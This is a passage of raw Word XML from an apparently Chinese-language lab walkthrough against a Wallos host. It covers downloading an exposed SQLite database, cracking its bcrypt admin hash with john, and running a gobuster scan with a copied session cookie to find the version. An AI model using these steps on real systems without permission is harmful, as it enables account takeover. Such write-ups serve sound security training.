        <w:t>打开开发者界面，以避免访问某些网页时遗漏隐藏信息。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C50357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidR="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访</w:t>
      </w:r>
      <w:r w:rsidR="00B37D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B37D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>路径即</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00CE6C89" w:rsidRPr="006B1D77">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.6.150/db/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CE6C89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007A3723">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>有一个文件</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A3723">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wallos.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A3723">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，点击</w:t>
      </w:r>
      <w:r w:rsidR="00CE6C89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下载该文件查看</w:t>
      </w:r>
      <w:r w:rsidR="00C50357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71B30C" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="000C65CE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142CBC7" wp14:editId="2FB7386C">
            <wp:extent cx="5274310" cy="2711450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="192017510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75101" name="图片 1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D68C" w14:textId="344455F4" w:rsidR="000C65CE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46952732" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00896CB3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ECC2024" wp14:editId="43F0BEBA">
            <wp:extent cx="5274310" cy="3011170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="66248488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84887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B12B" w14:textId="3E20C41A" w:rsidR="00896CB3" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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314C86C2" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00CE6C89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5A2A7B3" wp14:editId="13873B4B">
            <wp:extent cx="5274310" cy="2235200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="146178833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88333" name="图片 1" descr="图形用户界面, 文本, 应用程序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BFF0" w14:textId="1C2FF7CF" w:rsidR="00106085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69FDDE59" w14:textId="0FAB234B" w:rsidR="00A01732" w:rsidRDefault="00A01732" w:rsidP="0038424D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 w:rsidRPr="00A01732">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DB Browser for SQLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开该文件查看，</w:t>
      </w:r>
      <w:r w:rsidR="00737E2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现存在一个</w:t>
      </w:r>
      <w:r w:rsidR="00737E2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00737E2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>表，很可能存在用户名和密码，</w:t>
      </w:r>
      <w:r w:rsidR="006B6F6D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>右键浏览表查看发现一个用户名和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>散列</w:t>
      </w:r>
      <w:r w:rsidR="006B6F6D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的密码。</w:t>
      </w:r>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>尝试利用</w:t>
      </w:r>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>破解一下该密码。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00811040">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>讲该</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00811040">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00116514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存储在文件</w:t>
      </w:r>
      <w:r w:rsidR="00116514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hash.txt</w:t>
      </w:r>
      <w:r w:rsidR="00116514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在命令行输入</w:t>
      </w:r>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">john </w:t>
      </w:r>
      <w:r w:rsidR="00116514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hash.txt</w:t>
      </w:r>
      <w:r w:rsidR="00116514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，破解成功，密码为</w:t>
      </w:r>
      <w:r w:rsidR="00116514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00116514">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253BB6B3" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="009A5536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0A7AC2E" wp14:editId="27DA6643">
            <wp:extent cx="5274310" cy="3063875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="47763631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36317" name="图片 1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863A" w14:textId="59A5EB1A" w:rsidR="009A5536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74B6FB63" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00737E2C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1ED6F9A" wp14:editId="15281DEE">
            <wp:extent cx="5274310" cy="3730625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="131419614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96141" name="图片 1" descr="图形用户界面, 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11B2" w14:textId="6DBD8394" w:rsidR="00737E2C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0DFD3A3B" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="006B6F6D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9EB1ECD" wp14:editId="44DE3E43">
            <wp:extent cx="5274310" cy="683895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="177171410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14107" name="图片 1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337C" w14:textId="37FDB30E" w:rsidR="006B6F6D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21AD4466" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00116514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86B76C4" wp14:editId="776C4440">
            <wp:extent cx="5274310" cy="1662430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="67953097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30974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C21E" w14:textId="0E490540" w:rsidR="00811040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78965CCF" w14:textId="3DA4A61A" w:rsidR="00F042F2" w:rsidRDefault="00F042F2" w:rsidP="00DD663C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账户名和密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后登录成功，再重新爆破一下路径看有没有什么变化。</w:t>
      </w:r>
      <w:r w:rsidR="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>F12</w:t>
      </w:r>
      <w:r w:rsidR="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开开发</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>者工具</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>点解</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后刷新当前登录成功后的页面，</w:t>
      </w:r>
      <w:r w:rsidR="006552DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidR="006552DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="006552DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user-agent</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，将</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>值和</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user-agent</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>值复制下来，在命令行输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C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="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u '192.168.6.150' -w '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/wordlists/directory-list-2.3-medium.txt' -c 'PHPSESSID=bbbq9k6isipaqiqv8irer05anp; language=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; theme=light' -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD663C" w:rsidRPr="00DD663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jpg,txt,png,zip,php,bak,html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user-agent</w:t>
      </w:r>
      <w:r w:rsidR="00D46701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。扫描</w:t>
      </w:r>
      <w:r w:rsidR="0065289E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后发现有两个文件从重定向变为可直接访问了，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00703F42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00341FA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就是当前登录后的页面，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00341FA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>about.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A7BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中是当前</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A7BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wallos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A7BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的版本号。有了版本号就可以去查查看该版本号的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A7BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wallos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A7BDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是否存在漏洞</w:t>
      </w:r>
      <w:r w:rsidR="000976FB">
        <w:rPr>
